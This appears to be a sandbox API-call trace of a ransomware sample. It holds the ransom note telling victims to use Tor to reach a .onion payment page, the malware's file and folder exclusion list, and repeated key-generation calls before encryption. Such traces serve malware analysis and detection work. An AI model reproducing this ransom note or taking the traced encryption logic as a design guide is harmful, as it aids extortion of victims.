Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0155.626] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0155.626] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0155.626] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.626] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.626] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0155.626] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.626] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*.exe") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*.dll") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*.lnk") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*.bat") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*.ini") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*.msi") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*.scf") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*pagefile.sys*") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*NTUSER.DAT*") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*AppData*") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*\\winrar\\*") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*\\java\\*") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*\\windows\\*") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*\\ESET\\*") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*\\AVG\\*") returned 0 [0155.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*\\AVIRA\\*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*Atheros*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*Realtek*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*bootmgr*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*boot*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*boot*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*CONFIG.SYS*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*IO.SYS*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*MSDOS.SYS*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*NTDETECT.COM*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*ntldr*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*chrome*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*opera*") returned 0 [0155.627] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", pszSpec="*firefox*") returned 0 [0155.627] wcslen (_String="\\\\?\\") returned 0x4 [0155.627] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad1b8 [0155.627] wcscmp (_String1=".", _String2=".") returned 0 [0155.627] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0155.627] wcscmp (_String1="..", _String2=".") returned 1 [0155.627] wcscmp (_String1="..", _String2="..") returned 0 [0155.627] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*NMCRYPT") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*Recovers your files.html") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*.exe") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*.dll") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*.lnk") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*.bat") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*.ini") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*.msi") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*.scf") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*pagefile.sys*") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*AppData*") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*\\winrar\\*") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*\\java\\*") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*\\windows\\*") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*\\ESET\\*") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*\\AVG\\*") returned 0 [0155.627] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*Atheros*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*Realtek*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*bootmgr*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*boot*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*boot*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*IO.SYS*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*ntldr*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*chrome*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*opera*") returned 0 [0155.628] PathMatchSpecW (pszFile="insertbase.xml", pszSpec="*firefox*") returned 0 [0155.628] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml", pszSpec="*") returned 1 [0155.628] strlen (_Str="NMoreira") returned 0x8 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) 